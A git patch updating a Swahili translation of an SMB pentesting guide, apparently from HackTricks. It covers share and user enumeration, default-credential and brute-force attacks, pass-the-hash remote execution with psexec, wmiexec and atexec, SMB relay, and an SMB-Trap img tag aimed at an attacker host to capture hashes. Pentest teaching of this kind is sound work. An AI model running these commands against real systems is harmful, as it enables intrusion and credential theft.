From 3ccbb9fa7733fd2bb4ff6f291358e5dfc009de4d Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 8 Sep 2025 06:21:35 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-smb/README.md', --- src/SUMMARY.md | 1 + .../pentesting-smb/README.md | 197 ++++++++-------- ...bd-attack-surface-and-fuzzing-syzkaller.md | 219 ++++++++++++++++++ 3 files changed, 322 insertions(+), 95 deletions(-) create mode 100644 src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 793c88a81..b18b11ccd 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -494,6 +494,7 @@ - [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) - [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) - [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md) + - [Ksmbd Attack Surface And Fuzzing Syzkaller](network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md) - [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md) - [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) - [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 2b8366dfb..c55f9e3db 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md 
@@ -4,61 +4,60 @@ ## **Port 139** -_**Network Basic Input Output System**_** (NetBIOS)** ni protokali ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la ndani (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha uhamasishaji wa data kupitia mtandao**. Utambuzi na eneo la programu za programu zinazofanya kazi kwenye mtandao wa NetBIOS unafanywa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na urefu wa hadi herufi 16 na mara nyingi ni tofauti na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (ikienda kama mteja) inatoa amri ya "kuita" programu nyingine (ikienda kama seva) ikitumia **TCP Port 139**. +_**Network Basic Input Output System**_** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na **kuwezesha usafirishaji wa data kwenye mtandao**. Utambuzi na eneo la programu zinazofanya kazi kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na herufi hadi 16 kwa urefu na mara nyingi yanatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili kinaanzishwa wakati programu moja (acting as the client) inatoa amri ya "call" kwa programu nyingine (acting as the server) ikitumia **TCP Port 139**. ``` 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` ## Port 445 -Kitaalamu, Port 139 inajulikana kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. Kifupi **SMB** kinamaanisha ‘**Server Message Blocks**’, ambacho pia kinajulikana kisasa kama **Common Internet File System (CIFS)**. Kama itifaki ya mtandao ya kiwango cha programu, SMB/CIFS inatumika hasa kuwezesha ufikiaji wa pamoja wa faili, printers, serial ports, na kuwezesha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao. +Kiufundi, Port 139 inatajwa kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. 
Akronimu **SMB** inamaanisha ‘**Server Message Blocks**’, ambayo pia kwa sasa inajulikana kama **Common Internet File System (CIFS)**. Kwa kuwa ni protocol ya application-layer ya mtandao, SMB/CIFS hutumika hasa kuwezesha ufikiaji wa pamoja wa faili, vichapishi, bandari za serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao. -Kwa mfano, katika muktadha wa Windows, inasisitizwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kupitia matumizi ya port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa pamoja na NetBIOS juu ya TCP/IP. +Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa uhitaji wa NetBIOS over TCP/IP, kwa kutumia port 445. Kinyume chake, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, kuonyesha kwamba SMB inaendeshwa pamoja na NetBIOS over TCP/IP. ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) ``` ### SMB -Protokali ya **Server Message Block (SMB)**, inayofanya kazi katika mfano wa **mteja-server**, imeundwa kwa ajili ya kudhibiti **ufikiaji wa faili**, directories, na rasilimali nyingine za mtandao kama printers na routers. Kimsingi inatumika ndani ya mfululizo wa mifumo ya uendeshaji ya **Windows**, SMB inahakikisha ufanisi wa nyuma, ikiruhusu vifaa vyenye toleo jipya la mfumo wa uendeshaji wa Microsoft kuingiliana kwa urahisi na vile vinavyotumia toleo la zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu ya bure, linalowezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, hivyo kurahisisha mawasiliano kati ya majukwaa kupitia SMB. +Itifaki ya **Server Message Block (SMB)**, inayofanya kazi kwa muundo wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama vichapishaji na routers. 
Inatumiwa hasa ndani ya mfululizo wa mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vilivyo na matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuingiliana bila mshono na vilivyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, likiwezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, na hivyo kurahisisha mawasiliano ya majukwaa mbalimbali kupitia SMB. -Hisa, zinazoakisi **sehemu za kiholela za mfumo wa faili wa ndani**, zinaweza kutolewa na seva ya SMB, na kufanya hiyerarhii ionekane kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa seva. **Access Control Lists (ACLs)**, ambazo zinaelezea **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikiwa ni pamoja na sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na hisa, na ni tofauti na ruhusa za ndani zilizowekwa kwenye seva. +Shares, zinazo wakilisha **sehemu yoyote ya mfumo wa faili wa ndani**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa mviringo uonyeshewe kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server. ### IPC$ Share -Ufikiaji wa hisa ya IPC$ unaweza kupatikana kupitia kikao cha kutokujulikana, ikiruhusu mwingiliano na huduma zinazofichuliwa kupitia mabomba yaliyopewa majina. Chombo `enum4linux` ni muhimu kwa kusudi hili. Ikitumika ipasavyo, inaruhusu kupata: +Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. 
Utility `enum4linux` ni muhimu kwa madhumuni haya. Ikiwa itatumika vizuri, inaruhusu kupata: - Taarifa kuhusu mfumo wa uendeshaji - Maelezo kuhusu domain ya mzazi -- Mkusanyiko wa watumiaji na vikundi vya ndani -- Taarifa kuhusu hisa za SMB zinazopatikana -- Sera ya usalama wa mfumo inayofanya kazi +- Orodha ya watumiaji na vikundi vya ndani +- Taarifa kuhusu SMB shares zilizopo +- Sera ya usalama ya mfumo inayotekelezeka -Funguo hii ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` inatoa mtazamo mpana wa mazingira ya SMB ya mfumo lengwa, ambayo ni muhimu kwa kutambua udhaifu wa uwezekano na kuhakikisha kwamba huduma za SMB zimehifadhiwa ipasavyo. +Kazi hii ni muhimu kwa wasimamizi wa mtandao na wataalam wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaowezekana na kuhakikisha kuwa huduma za SMB zimewekwa salama ipasavyo. ```bash enum4linux -a target_ip ``` -Amri ya juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya uainishaji kamili dhidi ya lengo lililobainishwa na `target_ip`. +Amri iliyotangulia ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya lengo lililobainishwa na `target_ip`. 
-## Nini maana ya NTLM - -Ikiwa hujui nini maana ya NTLM au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo inaelezwa **jinsi protokali hii inavyofanya kazi na jinsi unavyoweza kuitumia:** +## NTLM ni nini +Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo umeelezwa **jinsi protocol hii inavyofanya kazi na jinsi unavyoweza kuinufaisha:** {{#ref}} ../../windows-hardening/ntlm/ {{#endref}} -## **Uainishaji wa Server** +## **Server Enumeration** -### **Scan** mtandao ukitafuta mwenyeji: +### **Scan** mtandao kutafuta hosts: ```bash nbtscan -r 192.168.0.1/24 ``` -### SMB server version +### Toleo la server la SMB -Ili kutafuta uwezekano wa kutumia udhaifu kwenye toleo la SMB, ni muhimu kujua ni toleo gani linatumika. Ikiwa taarifa hii haitokei katika zana nyingine zinazotumika, unaweza: +Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haitokei katika zana nyingine ulizotumia, unaweza: -- Tumia moduli ya **MSF** ya ziada `**auxiliary/scanner/smb/smb_version**` -- Au skripti hii: +- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**` +- Ama script hii: ```bash #!/bin/sh #Author: rewardone 
@@ -80,19 +79,19 @@ echo "" && sleep .1 msf> search type:exploit platform:windows target:2008 smb searchsploit microsoft smb ``` -### **Mikopo** Inayowezekana +### **Inawezekana** Credentials -| **Jina la mtumiaji(s)** | **Nywila za kawaida** | -| ------------------------ | ----------------------------------------- | -| _(bila)_ | _(bila)_ | -| mgeni | _(bila)_ | -| Msimamizi, admin | _(bila)_, nywila, msimamizi, admin | -| arcserve | arcserve, backup | -| tivoli, tmersrvd | tivoli, tmersrvd, admin | -| backupexec, backup | backupexec, backup, arcada | -| jaribio, maabara, onyesho | nywila, jaribio, maabara, onyesho | +| **Username(s)** | **Common passwords** | +| -------------------- | ----------------------------------------- | +| _(blank)_ | _(blank)_ | +| guest | _(blank)_ | +| Administrator, admin | _(blank)_, password, administrator, admin | +| arcserve | arcserve, backup | +| tivoli, tmersrvd | tivoli, tmersrvd, admin | +| backupexec, backup | backupexec, backup, arcada | +| test, lab, demo | password, test, lab, demo | -### Nguvu ya Brute +### Brute Force - [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb) @@ -120,9 +119,9 @@ rpcclient -U "username%passwd" #With creds /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` -### Orodha ya Watumiaji, Vikundi & Watumiaji Walioingia +### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia -Taarifa hii inapaswa kuwa tayari imekusanywa kutoka kwa enum4linux na enum4linux-ng +Taarifa hizi zinapaswa tayari kuwa zimekusanywa kutoka enum4linux na enum4linux-ng ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] 
@@ -140,17 +139,17 @@ enumdomgroups ```bash lookupsid.py -no-pass hostname.local ``` -Oneliner +Mstari mmoja ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` -### Metasploit - Kuorodhesha watumiaji wa ndani +### Metasploit - Enumerate watumiaji wa ndani ```bash use auxiliary/scanner/smb/smb_lookupsid set rhosts hostname.local run ``` -### **Kuhesabu LSARPC na SAMR rpcclient** +### **Kuorodhesha LSARPC and SAMR rpcclient** {{#ref}} @@ -159,19 +158,19 @@ rpcclient-enumeration.md ### Muunganisho wa GUI kutoka linux -#### Katika terminali: +#### Kwenye terminali: `xdg-open smb://cascade.htb/` -#### Katika dirisha la kivinjari cha faili (nautilus, thunar, nk) +#### Katika dirisha la kivinjari cha faili (nautilus, thunar, etc) `smb://friendzone.htb/general/` -## Kuhesabu Folda Zilizoshirikiwa +## Kuorodhesha Folda Zilizoshirikishwa -### Orodha ya folda zilizoshirikiwa +### Orodhesha folda ziloshirikishwa -Kila wakati inashauriwa kuangalia kama unaweza kufikia chochote, ikiwa huna akidi jaribu kutumia **null** **credentials/mtembezi wa wageni**. +Inashauriwa kila wakati kuangalia ikiwa unaweza kupata chochote, ikiwa huna credentials jaribu kutumia **null** **credentials/guest user**. ```bash smbclient --no-pass -L // # Null user smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash @@ -185,7 +184,7 @@ crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ``` -### **Unganisha/Ondoa orodha ya folda iliyo shirikiwa** +### **Unganisha/Orodhesha folda iliyoshirikiwa** ```bash #Connect using smbclient smbclient --no-pass /// 
@@ -197,11 +196,13 @@ smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ``` -### **Kuhesabu kwa mikono sehemu za windows na kuungana nazo** +### **Hesabu kwa mkono windows shares na kujiunga nazo** -Inaweza kuwa inawezekana kwamba umepigwa marufuku kuonyesha sehemu zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna sehemu za kuungana nazo. Hivyo inaweza kuwa na maana kujaribu kuungana kwa mikono na sehemu. Ili kuhesabu sehemu hizo kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapokuwa unatumia kikao halali (mfano, kikao kisicho na maudhui au akidi halali). Haya yanaweza kuashiria ikiwa sehemu hiyo ipo na huna ufaccess au sehemu hiyo haipo kabisa. +Inawezekana umezuiliwa kuonyesha shares zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares za kuunganishwa. Kwa hivyo inaweza kuwa vyema kujaribu kwa haraka kuunganishwa kwa mkono na share. -Majina ya kawaida ya sehemu kwa malengo ya windows ni +Ili kuhesabu shares kwa mkono unaweza kutaka kutazama majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, wakati unatumia session halali (mf. null session au valid credentials). Hizi zinaweza kuonyesha kama share ipo na huna ufikiaji kwake au share haipo kabisa. + +Majina ya shares ya kawaida kwa targets za Windows ni - C$ - D$ 
@@ -212,14 +213,14 @@ Majina ya kawaida ya sehemu kwa malengo ya windows ni - SYSVOL - NETLOGON -(Majina ya kawaida ya sehemu kutoka _**Network Security Assessment 3rd edition**_) +(Common share names from _**Network Security Assessment 3rd edition**_) -Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo +Unaweza kujaribu kujiunga nao kwa kutumia amri ifuatayo ```bash smbclient -U '%' -N \\\\\\ # null session to connect to a windows share smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password) ``` -au kwa ajili ya script hii (ikitumia kikao kisicho na thamani) +au script hii (ikitumia null session) ```bash #/bin/bash @@ -236,12 +237,12 @@ echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD fi done ``` -mfano +mifano ```bash smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session ``` -### **Kukadiria sehemu kutoka Windows / bila zana za upande wa tatu** +### **Orodhesha shares kutoka Windows / bila zana za pande za tatu** PowerShell ```bash 
@@ -267,16 +268,16 @@ fsmgmt.msc # Computer Management: Computer Management > System Tools > Shared Folders > Shares compmgmt.msc ``` -explorer.exe (grafiki), ingiza `\\\` kuona sehemu za kushiriki zisizo na siri. +explorer.exe (graphical), ingiza `\\\` ili kuona shares zisizo zilizofichwa zinazopatikana. -### Pandisha folda iliyo na sehemu ya pamoja +### Unganisha folda iliyoshirikiwa ```bash mount -t cifs //x.x.x.x/share /mnt/share mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` ### **Pakua faili** -Soma sehemu za awali kujifunza jinsi ya kuungana na akiba/Pass-the-Hash. +Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash. ```bash #Search a file and download sudo smbmap -R Folder -H -A -q # Search the file in recursive mode and download it inside /usr/share/smbmap @@ -293,14 +294,14 @@ smbclient /// ``` Amri: -- mask: inabainisha mask inayotumika kuchuja faili ndani ya directory (mfano: "" kwa faili zote) -- recurse: inawasha recursion (kawaida: off) -- prompt: inawasha kuomba majina ya faili (kawaida: on) -- mget: inakopi faili zote zinazolingana na mask kutoka kwa mwenyeji hadi mashine ya mteja +- mask: inaeleza mask ambayo inatumika kuchuja faili ndani ya saraka (e.g. "" for all files) +- recurse: huweka au huzima recursion (chaguo-msingi: off) +- prompt: huweka au huzima prompt ya majina ya faili (chaguo-msingi: on) +- mget: inakopa faili zote zinazolingana na mask kutoka host kwenda client machine -(_Taarifa kutoka kwa manpage ya smbclient_) +(_Taarifa kutoka kwenye manpage ya smbclient_) -### Utafutaji wa Folda za Kikoa Zilizoshirikiwa +### Utafutaji wa Folda Zilizoshirikiwa za Domain - [**Snaffler**](https://github.com/SnaffCon/Snaffler) ```bash 
@@ -312,15 +313,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data ```bash sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' ``` -Hasa ya kuvutia kutoka kwa sehemu ni faili zinazoitwa **`Registry.xml`** kwani zinaweza **kuhifadhi nywila** za watumiaji walioanzishwa na **autologon** kupitia Sera ya Kundi. Au faili za **`web.config`** kwani zina **akidi**. +Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. > [!TIP] -> **SYSVOL share** inapatikana **kusomwa** na watumiaji wote walioidhinishwa katika eneo. Ndani yake unaweza **kupata** batch nyingi tofauti, VBScript, na **scripts** za PowerShell.\ -> Unapaswa **kuangalia** **scripts** ndani yake kwani unaweza **kupata** taarifa nyeti kama vile **nywila**. +> Sehemu ya **SYSVOL share** inaweza kusomwa na watumiaji wote walioidhinishwa ndani ya domain. Ndani yake unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\ +> Unapaswa **kuangalia** **scripts** zilizomo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**. ## Soma Registry -Unaweza kuwa na uwezo wa **kusoma registry** ukitumia baadhi ya akidi zilizogunduliwa. Impacket **`reg.py`** inakuwezesha kujaribu: +Unaweza kuwa na uwezo wa **kusoma registry** ukitumia credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu: ```bash sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s 
@@ -328,35 +329,35 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87 ``` ## Post Exploitation -**Mipangilio ya default ya** **Samba** server kwa kawaida hupatikana katika `/etc/samba/smb.conf` na inaweza kuwa na **mipangilio hatari**: +**Mpangilio chaguo-msingi** cha **Samba** seva kwa kawaida hupatikana katika `/etc/samba/smb.conf` na linaweza kuwa na baadhi ya **mpangilio hatari**: -| **Mipangilio** | **Maelezo** | +| **Mpangilio** | **Maelezo** | | --------------------------- | ------------------------------------------------------------------- | -| `browseable = yes` | Ruhusu orodha ya sehemu zinazopatikana katika sehemu ya sasa? | -| `read only = no` | Kataza uundaji na mabadiliko ya faili? | -| `writable = yes` | Ruhusu watumiaji kuunda na kubadilisha faili? | -| `guest ok = yes` | Ruhusu kuungana na huduma bila kutumia nenosiri? | -| `enable privileges = yes` | Heshimu mamlaka yaliyotolewa kwa SID maalum? | -| `create mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa faili mpya zilizoundwa? | -| `directory mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa directories mpya zilizoundwa?| -| `logon script = script.sh` | Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji?| -| `magic script = script.sh` | Ni script ipi inapaswa kutekelezwa script inapofungwa? | -| `magic output = script.out` | Wapi matokeo ya script ya kichawi yanapaswa kuhifadhiwa? | +| `browseable = yes` | Je, inaruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? | +| `read only = no` | Je, inazuia uundaji na mabadiliko ya faili? | +| `writable = yes` | Je, inaruhusu watumiaji kuunda na kubadilisha faili? | +| `guest ok = yes` | Je, inaruhusu kuunganishwa na huduma bila kutumia nywila? | +| `enable privileges = yes` | Je, inaheshimu privileges zilizotengwa kwa SID maalum? | +| `create mask = 0777` | Ni ruhusa gani zinapaswa kupewa faili zilizoundwa hivi karibuni? 
| +| `directory mask = 0777` | Ni ruhusa gani zinapaswa kupewa saraka zilizoundwa hivi karibuni? | +| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? | +| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? | +| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? | -Amri `smbstatus` inatoa taarifa kuhusu **server** na kuhusu **nani ameungana**. +Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **ni nani ameunganishwa**. -## Authenticate using Kerberos +## Thibitisha kwa kutumia Kerberos -Unaweza **kujiandikisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**: +Unaweza **kuthibitisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**: ```bash smbclient --kerberos //ws01win10.domain.com/C$ rpcclient -k ws01win10.domain.com ``` -## **Teua Amri** +## **Tekeleza Amri** ### **crackmapexec** -crackmapexec inaweza kutekeleza amri **kwa kutumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec** ambapo **wmiexec** ndiyo njia **ya kawaida**. Unaweza kuashiria chaguo unalopendelea kutumia kwa kutumia parameter `--exec-method`: +crackmapexec inaweza kutekeleza amri **ikitumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo mbinu ya **default**. Unaweza kuonyesha chaguo unalopendelea kutumia kwa kigezo `--exec-method`: ```bash apt-get install crackmapexec 
@@ -380,7 +381,7 @@ crackmapexec smb -d -u Administrator -H #Pass-The-Hash ``` ### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md) -Chaguo zote mbili zita **unda huduma mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathirika na kuitumia **kutekeleza kitu** (**psexec** it **pakia** faili la executable kwenye ADMIN$ share na **smbexec** itaanika **cmd.exe/powershell.exe** na kuweka katika hoja payload --**mbinu isiyo na faili-**-).\ +Chaguzi zote mbili zitatengeneza **huduma mpya** (kutumia _\pipe\svcctl_ via SMB) kwenye mashine ya mwathiriwa na kuitumia **kutekeleza kitu** (**psexec** ita **upload** executable file kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments the payload --**file-less technique-**-).\ **Maelezo zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash 
@@ -390,19 +391,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ psexec \\192.168.122.66 -u Administrator -p 123456Ww psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash ``` -Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ya **NTLM** +Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM** ### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec -Fanya kazi ya amri kwa siri bila kugusa diski au kuendesha huduma mpya kwa kutumia DCOM kupitia **port 135.**\ -Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/ +Endesha kwa siri command shell bila kugusa disk au kuendesha service mpya kwa kutumia DCOM kupitia **port 135.**\ +Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash #If no password is provided, it will be prompted ./wmiexec.py [[domain/]username[:password]@] #Prompt for password ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` -Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ya **NTLM** +Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM** ```bash #If no password is provided, it will be prompted ./dcomexec.py [[domain/]username[:password]@] 
@@ -411,40 +412,46 @@ Kwa kutumia **parameter**`-k` unaweza kuthibitisha dhidi ya **kerberos** badala ``` ### [AtExec](../../windows-hardening/lateral-movement/atexec.md) -Tekeleza amri kupitia Mipango ya Kazi (ukitumia _\pipe\atsvc_ kupitia SMB).\ +Tekeleza amri kupitia Task Scheduler (kutumia _\pipe\atsvc_ kupitia SMB).\ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/ ```bash ./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` -## Impacket reference +## Marejeo ya Impacket [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/) -## **Kujaribu nguvu akauti za watumiaji** +### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller) -**Hii haipendekezwi, unaweza kufunga akaunti ikiwa utaongeza majaribio yaliyoruhusiwa** +{{#ref}} +ksmbd-attack-surface-and-fuzzing-syzkaller.md +{{#endref}} + +## **Bruteforce taarifa za kuingia za watumiaji** + +**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utavuka idadi ya jaribio zilizoruhusiwa** ```bash nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name ``` ## SMB relay attack -Huu shambulio unatumia zana ya Responder ili **kukamata vikao vya uthibitishaji vya SMB** kwenye mtandao wa ndani, na **kupeleka** kwa **mashine lengwa**. Ikiwa **sehemu ya uthibitishaji inafanikiwa**, itakushusha moja kwa moja kwenye **sistimu** **shell**.\ -[**Taarifa zaidi kuhusu shambulio hili hapa.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** them kwa **target machine**. 
Ikiwa authentication **session is successful**, it itaweka wewe moja kwa moja ndani ya **system** **shell**.\ +[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap -Maktaba ya Windows URLMon.dll inajaribu moja kwa moja kuthibitisha kwa mwenyeji wakati ukurasa unajaribu kufikia maudhui fulani kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"` +Maktaba ya Windows URLMon.dll hujaribu kiotomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"` -Hii inatokea na kazi: +This happens with the functions: - URLDownloadToFile - URLDownloadToCache - URLOpenStream - URLOpenBlockingStream -Ambazo zinatumika na baadhi ya vivinjari na zana (kama Skype) +Which are used by some browsers and tools (like Skype) ![From: 